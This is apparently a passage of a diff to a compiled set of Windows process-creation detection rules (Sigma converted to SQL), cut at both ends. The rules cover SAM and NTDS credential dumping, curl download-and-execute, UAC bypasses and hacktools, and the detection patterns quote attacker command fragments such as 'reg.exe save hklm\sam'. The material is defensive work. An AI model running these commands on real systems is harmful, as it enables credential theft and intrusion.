Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "status": "experimental", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', 
'37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.discovery", - "attack.persistence", "attack.defense_evasion", - "attack.credential_access", "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", - "author": "frack113", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036.005" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." 
+ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with 
the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ + "attack.g0032", "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" 
], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ "attack.collection", - "attack.t1560" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", - "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": 
"39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certipy a tool for Active Directory Certificate 
Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": 
"proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "status": "experimental", - "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.", - "author": "omkar72", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND 
CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1574.008" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
